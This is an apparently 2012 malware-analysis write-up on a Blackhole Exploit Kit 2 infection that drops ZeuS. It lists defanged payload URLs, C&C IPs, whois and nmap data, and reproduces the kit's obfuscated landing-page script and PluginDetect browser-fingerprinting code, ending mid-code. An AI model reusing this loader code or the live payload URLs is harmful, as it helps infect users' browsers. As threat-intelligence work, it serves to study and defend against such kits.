- =====================================================
- #MalwareMustDie!!!!!!!!!!!! | Sat Oct 27 18:29:21 JST 2012
- FreeBSD unixfreaxjp 9.0-RELEASE-p4 FreeBSD 9.0-RELEASE-p4 #
- This is the large infection of BHEK2 hinted by @xxxxrxero followed by @unixfreaxjp
- Hit by MDAC Exploit Infection & Downloaded the Trojan, Backdoor, Encrypt, Downloader 03ab326.exe' saved [256784/256784]
- I am pretty sure this one is ZeuS, since the VT detection ratio is still too low.
- url: h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy
- Also drops other troj: h00p://4.icedambusters.com/adobe/update_flash_player.exe
- Referers point to: 74.200.211.205
- CNC: 198.143.159.66
- After being infected by 03ab326.exe it also downloaded THREE MORE TROJANS from:
- h00p://springbackcolorado.com/CaBPXFg.exe
- h00p://180degrees.org.nz/cXbAC.exe
- h00p://weareseasons.com/7yoZf5.exe
- PluginDetect VT(5/44): h00ps://www.virustotal.com/file/ebf5a59e4f7212cca87a6b6bf9d646189674f40c3d0f765a2adf62b9ba0a9ca4/analysis/1351330706/
- Troj Downloader VT(8/44): h00ps://www.virustotal.com/file/94258a10d190c941b697246453974bd892f63c77880073674ee1759fa550f5b8/analysis/1351330579/
- The Trojan Zbot(Main) VT(4/44): h00ps://www.virustotal.com/file/166c1a35cf4f24e3678ad0d2c863b95d8a49448915bfcf31eccb5412d9b1ca8e/analysis/1351330452/
- ======================================================
- ========================
- INFECTIONS SCHEME
- ========================
- #include Hint: HINT.TXT;
- ---------------------------------------------------------------------------------------------------------------------------...
- LANDING PAGE JS.JS PLUGIN DETECT OBFS
- ---------------------------------------------------------------------------------------------------------------------------...
- ==================================
- INFECTOR DETAILS;
- 74.200.211.205
- ==================================
- NetRange: 74.200.192.0 - 74.200.255.255
- CIDR: 74.200.192.0/18
- OriginAS: AS16805, AS22576
- NetName: LAYERED-TECH-CHI
- NetHandle: NET-74-200-192-0-1
- Parent: NET-74-0-0-0-0
- NetType: Direct Allocation
- RegDate: 2006-11-14
- Updated: 2012-02-24
- Ref: h00p://whois.arin.net/rest/net/NET-74-200-192-0-1
- OrgName: Layered Technologies, Inc.
- OrgId: LAYER-3
- Address: 5085 W Park Blvd
- Address: Suite 700
- City: Plano
- StateProv: TX
- PostalCode: 75093
- Country: US
- RegDate: 2004-07-21
- Updated: 2010-08-13
- Comment: Please send all abuse complaints to abuse@layeredtech.com
- Ref: h00p://whois.arin.net/rest/org/LAYER-3
- PORT STATE SERVICE
- 21/tcp open ftp
- 25/tcp open smtp
- 26/tcp closed unknown
- 53/tcp open domain
- 80/tcp open h00p
- 110/tcp open pop3
- 143/tcp closed imap
- 443/tcp open h00ps
- 587/tcp open submission
- 993/tcp closed imaps
- 995/tcp closed pop3s
- No exact OS matches for host (If you know what OS is running on it, see h00p://www.insecure.org/cgi-bin/nmap-submit.cgi).
- TCP/IP fingerprint:
- SInfo(V=3.70%P=i686-redhat-linux-gnu%D=10/27%Time=508B9336%O=21%C=26)
- TSeq(Class=TR%IPID=I%TS=0)
- T1(Resp=Y%DF=N%W=4000%ACK=S++%Flags=AS%Ops=MNWNNT)
- T2(Resp=N)
- T3(Resp=N)
- T4(Resp=N)
- T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
- T6(Resp=N)
- T7(Resp=N)
- PU(Resp=N)
- ==================================
- CNC / CONTROL DETAILS;
- IP: 198.143.159.66
- ==================================
- IP: 198.143.159.66
- NetRange: 198.143.128.0 - 198.143.191.255
- CIDR: 198.143.128.0/18
- OriginAS: AS32475
- NetName: SINGLEHOP
- NetHandle: NET-198-143-128-0-1
- Parent: NET-198-0-0-0-0
- NetType: Direct Allocation
- RegDate: 2012-05-16
- Updated: 2012-05-16
- Ref: h00p://whois.arin.net/rest/net/NET-198-143-128-0-1
- OrgName: SingleHop, Inc.
- OrgId: SINGL-8
- Address: 621 W. Randolph St.
- Address: 3rd Floor
- City: Chicago
- StateProv: IL
- PostalCode: 60661
- Country: US
- RegDate: 2007-03-07
- Updated: 2010-03-23
- Comment: h00p://www.singlehop.com/
- Ref: h00p://whois.arin.net/rest/org/SINGL-8
- PORT STATE SERVICE
- 22/tcp open ssh
- 80/tcp open h00p
- 135/tcp filtered msrpc
- 136/tcp filtered profile
- 137/tcp filtered netbios-ns
- 138/tcp filtered netbios-dgm
- 139/tcp filtered netbios-ssn
- 445/tcp filtered microsoft-ds
- No exact OS matches for host (If you know what OS is running on it, see h00p://www.insecure.org/cgi-bin/nmap-submit.cgi).
- TCP/IP fingerprint:
- SInfo(V=3.70%P=i686-redhat-linux-gnu%D=10/27%Time=508B94D1%O=22%C=1)
- TSeq(Class=TR%IPID=Z%TS=1000HZ)
- T1(Resp=Y%DF=Y%W=3890%ACK=S++%Flags=AS%Ops=MNNTNW)
- T2(Resp=N)
- T3(Resp=N)
- T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
- T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
- T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
- T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
- PU(Resp=Y%DF=N%TOS=0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
- ============================================
- Grab the pluginDetect & you get the CNC!
- ============================================
- $ myfetch --h00p_proxy=yes
- --user-agent="Mozila/4.3(X11; U; MacOSX)"
- --cookies=on --keep-session-cookies --save-cookies mycookies.txt
- --referer="h00p://74.200.211.205/SQeyUUzT/js.js"
- --target="h00p://ser.luckypetspetsitting.com/links/return-west.php"
- // w/tor
- --16:21:02-- h00p://ser.luckypetspetsitting.com/links/return-west.php
- => `return-west.php'
- Connecting to 192.168.7.11:8118... connected.
- Proxy request sent, awaiting response... 502 Bad Gateway
- 16:21:14 ERROR 502: Bad Gateway.
- // gatling IP
- --16:21:34-- h00p://ser.luckypetspetsitting.com/links/return-west.php
- => `return-west.php'
- Resolving ser.luckypetspetsitting.com... 198.143.159.66
- Connecting to ser.luckypetspetsitting.com|198.143.159.66|:80... connected.
- h00p request sent, awaiting response... 200 OK
- Length: unspecified [text/html]
- 16:21:37 (131.58 KB/s) - `return-west.php' saved [28878]
- ============================
- DECODING ANALYSIS
- ===========================
- //Wepawet OK, jsunpack BAD, Malzilla OK, Revello BAD, SteamDumper OK
38="e421m4c@454e474k48&2e201e1e43+1m494j2m4l%4e431g423j)203l1h1h1h#1h53411m4g*4l4j481g42!1h55551k43^414c4c2h4i_4i41512a46$4l4e434k49(4f4e1g421h@534m414i18&432d4k4849+4j1k412b49%461g431m49)4j2h4i4i41#511g421h1h*53464f4i1g!412d202b41^2c421m4c45_4e474k482b$411j1j1h53(49461g423j@413l2d2d2d&4e4l4c4c1h+534i45" 20="422d1n&3m3j3k1c3l+3j3k1c3l1n%1k432d4k48)494j2b464f#4i1g411849*4e18461h53!49461g421m^4k454j4k1g_411h1h534k$4i5153472d(411m4j4c49@43451g221h&2b49461g47+1m4c454e47%4k482e201e)1e19463j47#3l1h53463j*473l2d463j!413l1g461h^2b44454c45_4k4518463j$413l555543(414k43481g@441h535555&55551k494e+494k37424a%2a464l4" 67="452d1a1f(1j483j4f3l@1j1f1a184m&414c4l452d+1a1f1j483j%4f1j213l1j)1f1a181n2e#1f55554h1j*2d411j461j!1a1n1a1j47^1j1a2e1a55_454c4j4553$4h2d415549(461g194b1m@44494m1h53&4a2d4e1m47+454k2l4c45%4d454e4k2i)5131441g4b#1m44494m31*2k1h2b4946!1g4a1h534b^1m44494m2d_4a55454c4j$45534b1m44(494m2d4e1m@434i45414k&452l4" 74="l21212j2m$1l2h22242k(1l24242425@2523252420&2020201a1k+31363b3c2h%34342l2k2a)53551k4g4c#4l47494e30*414j35494d!453c514g45^2a464l4e43_4k494f4e1g$441k431k46(1h534m414i@18422d4k48&494j1k452d+421m1c1k41%2b464f4i1g)4118494e18#441h534946*1g443j413l!1e1e443j41^3l1m4k514g_451e1e443j$413l1m4k51(4g452d2d43@1h53" 73="h*55551k384c!4l47494e4j^2a5341444f_42454i4541$44454i2a53(4d494d453c@514g452a1a&414g4g4c49+43414k494f%4e1n4g4446)1a1k4e414m#384c4l4749*4e37424a2a!4e4l4c4c1k^4g4i4f4731_2k2a3j1a2h$434i4f382k(2m1m382k2m@1a1k1a382k&2m1m384446+2j4k4i4c1a%3l1k434c41)4j4j312k2a#1a434c4j49*442a2j2h28!2h29272820^1l2228202k_1" 54="e18)1l21551k47#454k3c4147*3b4k414k4l!4j2a464l4e^434k494f4e_1g4d1k471k$411k421h53(4m414i1843@2d4k48494j&1k461k4b2d+4d1m4j4g41%4e1k4c2d43)1m47454k3f#49444k481g*4b1h1k482d!411m4j4g41^4e1k4a2d43_1m47454k3f$49444k481g(481h1k442d@471m4j4g41&4e1k492d43+1m47454k3f%49444k481g)441h2b4946#1g194b5454*1948545419" 
59="1j221h534k_4i5153463j$473j413l3l(2d473j411j@213l554341&4k43481g44+1h53555555%551k494e4j)454i4k2k49#4m314e2i4f*44512a464l!4e434k494f^4e1g411k49_1h534m414i$18481k462d(4k48494j1k@422d1a4g44&2323292923+2329291a1k%442d4e4l4c)4c1k4a2d49#2f4n494e44*4f4n1m4k4f!4g1m444f43^4l4d454e4k_2a4n494e44$4f4n1m444f(434" 92="1h53555543_414k43481g$451h535555(43414k4348@1g454i4i4e&4f1h535544+4f434l4d45%4e4k1m4n4i)494k451g1f#1f1h2b4j45*4k3c494d45!4f4l4k1g45^4e443n4i45_44494i4543$4k1k262020(20201h2b" 76="51k)411k432b49#461g441m49*4j3b4k4i49!4e471g4a1h^1h534a2d4a_1m4i454g4c$4143451g1n(3k4j1n471k@1a1a1h2b49&461g4a1h53+4b2d4a5555%454c4j4553)4a2d4e4l4c#4c5549461g*441m494j2k!4546494e45^441g471m31_363b3c2h34$342l2k3j4b(3l1h1h5347@1m494e4j4k&414c4c4544+2d471m3136%3b3c2h3434)2l2k3j4b3l#2b4i454k4l*4i4e554946" 88="!4k4k4i4942^4l4k451g1a_49441a1k4i$41231h2b4i(41231m4j45@4k2h4k4k4i&49424l4k45+1g1a434c41%4j4j49441a)1k1a434c4j#49442a2i2k*29262j2525!261l26252h^231l21212k_201l292823$2h1l20202j(20242m2j22@292l23261a&1h2b4k4i51+534m414i18%4i41202d4i)41231m2j4i#45414k4537*424a45434k!1g1a41444f^441a1m434f_4e43414k1g$1a" 2="22d2d+1a464l4e43%4k494f4e1a)551k494j3b#4k4i494e47*2a464l4e43!4k494f4e1g^421h534i45_4k4l4i4e18$4k514g454f(4618422d2d@1a4j4k4i49&4e471a551k+494j364l4d%2a464l4e43)4k494f4e1g#421h534i45*4k4l4i4e18!4k514g454f^4618422d2d_1a4e4l4d42$454i1a551k(494j3b4k4i@364l4d2a46&4l4e434k49+4f4e1g421h%534i454k4l)4i4e1g4k" 72="4c44%1g4g1h5543)414k43481g#4d1h53552b*4i454k4l4i!4e534j4g41^4e2a4g1k4n_494e344f41$4445442a4b(1m4n494e34@4f41444544&1k4k414736+414d452a47%1k4f4l4k45)4i303c3534#2a4h55554i*454k4l4i4e!534j4g414e^2a4e4l4c4c_1k4n494e34$4f41444544(2a4b1m4n49@4e344f4144&45441k4k41+4736414d45%2a1a1a1k4f)4l4k454i30#3c35342a4" 
18="l*4d3a454750!1h2b464f4i^1g412d202b_412c441m4c$454e474k48(2b411j1j1h@5349461g43&2e1l211e1e+412e431e1e%443j413l19)2d1a201a1h#534i454k4l*4i4e184255!49461g473j^413l192d44_3j413l1h53$49461g432d(2d1l211h53@432d415549&461g443j41+3l192d1a20%1a1h534i45)4k4l4i4e18#425555554i*454k4l4i4e!1845551k2h^3g372a4n49_4" 63="k4a1k462d$1a2c1a2b4m(414i18432d@3j1a4f4l4k&4c494e453b+4k514c451a%1k1a4e4f4e)451a1k1a42#4f4i44454i*3b4k514c45!1a1k1a4e4f^4e451a1k1a_4g41444449$4e471a1k1a(204g501a1k@1a4d414i47&494e1a1k1a+204g501a1k%1a4m494j49)42494c494k#511a1k1a4m*494j49424c!451a3l2b4m^414i18492d_1a4f4l4k4c$494e451l4j(4k514c452a@4e4f" 9="1g201k&241h1m4a4f+494e1g1a1k%1a1h551k1c)1c48414j35#494d453c51*4g452a464l!4e434k494f^4e1g411h53_4i454k4l4i$4e18464l4e(434k494f4e@1g431h5349&461g19411m+494j312l1e%1e431h534m)414i18461k#451k421k44*2d411m494j!2h4i4i4151^1g431h2f43_2a1g411m49$4j3b4k4i49(4e471g431h@2f3j433l2a&3j3l1h2b46+4f4i1g422d%202b422" 14="41#3j463l5555*554i454k4l!4i4e184e4l^4c4c551k47_454k35494d$452l4e4142(4c4544384c@4l47494e2a&464l4e434k+494f4e1g4b%1k4d1k431h)534m414i18#452d4k4849*4j1k461k42!2d4e454n18^3a45472l50_4g1g4d1k1a$491a1h1k48(2d1a1a1k47@2d432f4e45&4n183a4547+2l504g1g43%1k1a491a1h)2a201k411k#4c1k441k4a*2d451m494j!3b4k4i494e^"></span><script>
- if(zxc){var q=asd();
- var s="",a="";
- for(i=0;i<93;i++){
- s+=asd2();
- }
- s=s.replace(/[^a-z0-9]+/g,"");
- for(i=0;i<s.length;i+=2){
- window.asd3();
- }
- try{window.document.body=s}catch(awt){asd4()}}
- </script></body></html>
- ---------------------------------------------------------------------------------------
- // BHEK2 Plugin Detect.....these morons never learn...
- // I won't spend my time on PDF and jar, I aimed straight at PE infectors..
- // You guys can go ahead with jar and PDF
- // rgds, @unixfreaxjp
- try {
- var PluginDetect = {
- version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){
- return function (){
- c(b, a)
- }
- }
- , isDefined : function (b){
- return typeof b != "undefined"
- }
- , isArray : function (b){
- return (/array/i).test(Object.prototype.toString.call(b))
- }
- , isFunc : function (b){
- return typeof b == "function"
- }
- , isString : function (b){
- return typeof b == "string"
- }
- , isNum : function (b){
- return typeof b == "number"
- }
- , isStrNum : function (b){
- return (typeof b == "string" && (/\d/).test(b))
- }
- , getNumRegx : /[\d][\d\.\_,-]*/, splitNumRegx : /[\.\_,-]/g,
- getNum : function (b, c){
- var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).
- exec(b) : null;
- return a ? a[0] : null
- }
- , compareNums : function (h, f, d){
- var e = this , c, b, a, g = parseInt;
- if (e.isStrNum(h) && e.isStrNum(f)){
- if (e.isDefined(d) && d.compareNums){
- return d.compareNums(h, f)
- }
- c = h.split(e.splitNumRegx);
- b = f.split(e.splitNumRegx);
- for (a = 0; a < Math.min(c.length, b.length);
- a ++ ){
- if (g(c[a], 10) > g(b[a], 10)){
- return 1
- }
- if (g(c[a], 10) < g(b[a], 10)){
- return - 1
- }
- }
- }
- return 0
- }
- , formatNum : function (b, c){
- var d = this , a, e;
- if (!d.isStrNum(b)){
- return null
- }
- if (!d.isNum(c)){
- c = 4
- }
- c--;
- e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
- for (a = 0; a < 4; a ++ ){
- if (/^(0+)(.+)$/.test(e[a])){
- e[a] = RegExp.$2
- }
- if (a > c ||! (/\d/).test(e[a])){
- e[a] = "0"
- }
- }
- return e.slice(0, 4).join(",")
- }
- , $$hasMimeType : function (a){
- return function (c){
- if (!a.isIE && c){
- var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
- for (b = 0; b < d.length; b ++ ){
- if (a.isString(d[b]) && /[^\s]/.test(d[b])){
- f = navigator.mimeTypes[d[b]];
- e = f ? f.enabledPlugin : 0;
- if (e && (e.name || e.description)){
- return f
- }
- }
- }
- }
- return null
- }
- }
- , findNavPlugin : function (l, e, c){
- var j = this , h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ? /\d/ : 0, k = c ?
- new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m;
- for (f = 0; f < a.length; f ++ ){
- m = a[f].description || g;
- b = a[f].name || g;
- if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.
- test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){
- if (!k ||! (k.test(m) || k.test(b))){
- return a[f]
- }
- }
- }
- return null
- }
- , getMimeEnabledPlugin : function (k, m, c){
- var e = this , f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a,
- l, d, j = e.isString(k) ? [k] : k;
- for (d = 0; d < j.length; d ++ ){
- if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){
- l = f.description || h;
- a = f.name || h;
- if (b.test(l) || b.test(a)){
- if (!g ||! (g.test(l) || g.test(a))){
- return f
- }
- }
- }
- }
- return 0
- }
- , getPluginFileVersion : function (f, b){
- var h = this , e, d, g, a, c =- 1;
- if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){
- return b
- }
- if (!b){
- return e
- }
- e = h.formatNum(e);
- b = h.formatNum(b);
- d = b.split(h.splitNumRegx);
- g = e.split(h.splitNumRegx);
- for (a = 0; a < d.length; a ++ ){
- if (c >- 1 && a > c && d[a] != "0"){
- return b
- }
- if (g[a] != d[a]){
- if (c ==- 1){
- c = a
- }
- if (d[a] != "0"){
- return b
- }
- }
- }
- return e
- }
- , AXO : window.ActiveXObject, getAXO : function (a){
- var f = null, d, b = this , c = {
- }
- ;
- try {
- f = new b.AXO(a)
- }
- catch (d){
- }
- return f
- }
- , convertFuncs : function (f){
- var a, g, d, b = /^[\$][\$]/, c = this ;
- for (a in f){
- if (b.test(a)){
- try {
- g = a.slice(2);
- if (g.length > 0 &&! f[g]){
- f[g] = f[a](f);
- delete f[a]
- }
- }
- catch (d){
- }
- }
- }
- }
- , initObj : function (e, b, d){
- var a, c;
- if (e){
- if (e[b[0]] == 1 || d){
- for (a = 0; a < b.length; a = a + 2){
- e[b[a]] = b[a + 1]
- }
- }
- for (a in e){
- c = e[a];
- if (c && c[b[0]] == 1){
- this .initObj(c, b)
- }
- }
- }
- }
- , initScript : function (){
- var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "",
- b = a.platform || "", h = a.product || "";
- c.initObj(c, ["$", c]);
- for (f in c.Plugins){
- if (c.Plugins[f]){
- c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
- }
- }
- ;
- c.OS = 100;
- if (b){
- var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod",
- 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, ""
- , 100];
- for (f = d.length - 2; f >= 0; f = f - 2){
- if (d[f] && new RegExp(d[f], "i").test(b)){
- c.OS = d[f + 1];
- break
- }
- }
- }
- c.convertFuncs(c);
- c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName(
- "body")[0] || document.body || null);
- c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
- c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) :
- null ;
- c.ActiveXEnabled = false;
- if (c.isIE){
- var f, j = ["Msxml2.XMLh00p", "Msxml2.DOMDocument", "Microsoft.XMLDOM",
- "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper",
- "Scripting.Dictionary", "wmplayer.ocx"];
- for (f = 0; f < j.length; f ++ ){
- if (c.getAXO(j[f])){
- c.ActiveXEnabled = true;
- break
- }
- }
- }
- c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
- c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 :
- "0.9") : null;
- c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
- c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
- c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && (
- /Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
- c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(
- RegExp.$1) : null;
- c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
- c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ?
- parseFloat(RegExp.$1, 10) : null;
- c.addWinEvent("load", c.handler(c.runWLfuncs, c))
- }
- , init : function (d){
- var c = this , b, d, a = {
- status :- 3, plugin : 0
- }
- ;
- if (!c.isString(d)){
- return a
- }
- if (d.length == 1){
- c.getVersionDelimiter = d;
- return a
- }
- d = d.toLowerCase().replace(/\s/g, "");
- b = c.Plugins[d];
- if (!b ||! b.getVersion){
- return a
- }
- a.plugin = b;
- if (!c.isDefined(b.installed)){
- b.installed = null;
- b.version = null;
- b.version0 = null;
- b.getVersionDone = null;
- b.pluginName = d
- }
- c.garbage = false;
- if (c.isIE &&! c.ActiveXEnabled && d !== "java"){
- a.status =- 2;
- return a
- }
- a.status = 1;
- return a
- }
- , fPush : function (b, a){
- var c = this ;
- if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0
- ])))){
- a.push(b)
- }
- }
- , callArray : function (b){
- var c = this , a;
- if (c.isArray(b)){
- for (a = 0; a < b.length; a ++ ){
- if (b[a] === null){
- return
- }
- c.call(b[a]);
- b[a] = null
- }
- }
- }
- , call : function (c){
- var b = this , a = b.isArray(c) ? c.length :- 1;
- if (a > 0 && b.isFunc(c[0])){
- c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
- }
- else {
- if (b.isFunc(c)){
- c(b)
- }
- }
- }
- , getVersionDelimiter : ",", $$getVersion : function (a){
- return function (g, d, c){
- var e = a.init(g), f, b, h = {
- }
- ;
- if (e.status < 0){
- return null
- }
- ;
- f = e.plugin;
- if (f.getVersionDone != 1){
- f.getVersion(null, d, c);
- if (f.getVersionDone === null){
- f.getVersionDone = 1
- }
- }
- a.cleanup();
- b = (f.version || f.version0);
- b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
- return b
- }
- }
- , cleanup : function (){
- }
- , addWinEvent : function (d, c){
- var e = this , a = window, b;
- if (e.isFunc(c)){
- if (a.addEventListener){
- a.addEventListener(d, c, false)
- }
- else {
- if (a.attachEvent){
- a.attachEvent("on" + d, c)
- }
- else {
- b = a["on" + d];
- a["on" + d] = e.winHandler(c, b)
- }
- }
- }
- }
- , winHandler : function (d, c){
- return function (){
- d();
- if (typeof c == "function"){
- c()
- }
- }
- }
- , WLfuncs0 : [], WLfuncs : [], runWLfuncs : function (a){
- var b = {
- }
- ;
- a.winLoaded = true;
- a.callArray(a.WLfuncs0);
- a.callArray(a.WLfuncs);
- if (a.onDoneEmptyDiv){
- a.onDoneEmptyDiv()
- }
- }
- , winLoaded : false, $$onWindowLoaded : function (a){
- return function (b){
- if (a.winLoaded){
- a.call(b)
- }
- else {
- a.fPush(b, a.WLfuncs)
- }
- }
- }
- , div : null, divID : "plugindetect", divWidth : 50, pluginSize : 1, emptyDiv :
- function (){
- var d = this , b, h, c, a, f, g;
- if (d.div && d.div.childNodes){
- for (b = d.div.childNodes.length - 1; b >= 0; b -- ){
- c = d.div.childNodes[b];
- if (c && c.childNodes){
- for (h = c.childNodes.length - 1; h >= 0; h -- ){
- g = c.childNodes[h];
- try {
- c.removeChild(g)
- }
- catch (f){
- }
- }
- }
- if (c){
- try {
- d.div.removeChild(c)
- }
- catch (f){
- }
- }
- }
- }
- if (!d.div){
- a = document.getElementById(d.divID);
- if (a){
- d.div = a
- }
- }
- if (d.div && d.div.parentNode){
- try {
- d.div.parentNode.removeChild(d.div)
- }
- catch (f){
- }
- d.div = null
- }
- }
- , DONEfuncs : [], onDoneEmptyDiv : function (){
- var c = this , a, b;
- if (!c.winLoaded){
- return
- }
- if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){
- return
- }
- for (a in c){
- b = c[a];
- if (b && b.funcs){
- if (b.OTF == 3){
- return
- }
- if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){
- return
- }
- }
- }
- for (a = 0; a < c.DONEfuncs.length; a ++ ){
- c.callArray(c.DONEfuncs)
- }
- c.emptyDiv()
- }
- , getWidth : function (c){
- if (c){
- var a = c.scrollWidth || c.offsetWidth, b = this ;
- if (b.isNum(a)){
- return a
- }
- }
- return - 1
- }
- , getTagStatus : function (m, g, a, b){
- var c = this , f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d =
- g.span, i = c.getWidth(d);
- if (!k ||! h ||! d ||! c.getDOMobj(m)){
- return - 2
- }
- if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1){
- return 0
- }
- if (l >= i){
- return - 1
- }
- try {
- if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){
- if (!m.winLoaded && c.winLoaded){
- return 1
- }
- if (m.winLoaded && c.isNum(b)){
- if (!c.isNum(m.count)){
- m.count = b
- }
- if (b - m.count >= 10){
- return 1
- }
- }
- }
- }
- catch (f){
- }
- return 0
- }
- , getDOMobj : function (g, a){
- var f, d = this , c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0;
- try {
- if (b && a){
- d.div.focus()
- }
- }
- catch (f){
- }
- return b ? c.firstChild : null
- }
- , setStyle : function (b, g){
- var f = b.style, a, d, c = this ;
- if (f && g){
- for (a = 0; a < g.length; a = a + 2){
- try {
- f[g[a]] = g[a + 1]
- }
- catch (d){
- }
- }
- }
- }
- , insertDivInBody : function (a, i){
- var h, f = this , b = "pd33993399", d = null, j = i ? window.top.document : window.
- document, c = "<", g = (j.getElementsByTagName("body")[0] || j.body);
- if (!g){
- try {
- j.write(c + 'div id="' + b + '">o' + c + "/div>");
- d = j.getElementById(b)
- }
- catch (h){
- }
- }
- g = (j.getElementsByTagName("body")[0] || j.body);
- if (g){
- if (g.firstChild && f.isDefined(g.insertBefore)){
- g.insertBefore(a, g.firstChild)
- }
- else {
- g.appendChild(a)
- }
- if (d){
- g.removeChild(d)
- }
- }
- else {
- }
- }
- , insertHTML : function (g, b, h, a, l){
- var m, n = document, k = this , q, p = n.createElement("span"), o, j, f = "<";
- var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin",
- "0px", "visibility", "visible"];
- var i =
- "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
- if (!k.isDefined(a)){
- a = ""
- }
- if (k.isString(g) && (/[^\s]/).test(g)){
- g = g.toLowerCase().replace(/\s/g, "");
- q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
- q += 'style="' + i + 'display:inline;" ';
- for (o = 0; o < b.length; o = o + 2){
- if (/[^\s]/.test(b[o + 1])){
- q += b[o] + '="' + b[o + 1] + '" '
- }
- }
- q += ">";
- for (o = 0; o < h.length; o = o + 2){
- if (/[^\s]/.test(h[o + 1])){
- q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
- }
- }
- q += a + f + "/" + g + ">"
- }
- else {
- q = a
- }
- if (!k.div){
- j = n.getElementById(k.divID);
- if (j){
- k.div = j
- }
- else {
- k.div = n.createElement("div");
- k.div.id = k.divID
- }
- k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize +
- 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3)
- + "px", "verticalAlign", "baseline", "display", "block"]));
- if (!j){
- k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
- k.insertDivInBody(k.div)
- }
- }
- if (k.div && k.div.parentNode){
- k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.
- pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
- try {
- p.innerHTML = q
- }
- catch (m){
- }
- ;
- try {
- k.div.appendChild(p)
- }
- catch (m){
- }
- ;
- return {
- span : p, winLoaded : k.winLoaded, tagName : g, outerHTML : q
- }
- }
- return {
- span : null, winLoaded : k.winLoaded, tagName : "", outerHTML : q
- }
- }
- , Plugins : {
- adobereader : {
- mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF",
- "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED :
- {
- }
- , pluginHasMimeType : function (d, c, f){
- var b = this , e = b.$, a;
- for (a in d){
- if (d[a] && d[a].type && d[a].type == c){
- return 1
- }
- }
- if (e.getMimeEnabledPlugin(c, f)){
- return 1
- }
- return 0
- }
- , getVersion : function (l, j){
- var g = this , d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c;
- if (d.isString(j)){
- j = j.replace(/\s/g, "");
- if (j){
- k = j
- }
- }
- else {
- j = null
- }
- if (d.isDefined(g.INSTALLED[k])){
- g.installed = g.INSTALLED[k];
- return
- }
- if (!d.isIE){
- a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
- if (g.getVersionDone !== 0){
- g.getVersionDone = 0;
- b = d.getMimeEnabledPlugin(g.mimeType, a);
- if (!j){
- n = b
- }
- if (!b && d.hasMimeType(g.mimeType)){
- b = d.findNavPlugin(a, 0)
- }
- if (b){
- g.navPluginObj = b;
- h = d.getNum(b.description) || d.getNum(b.name);
- h = d.getPluginFileVersion(b, h);
- if (!h && d.OS == 1){
- if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){
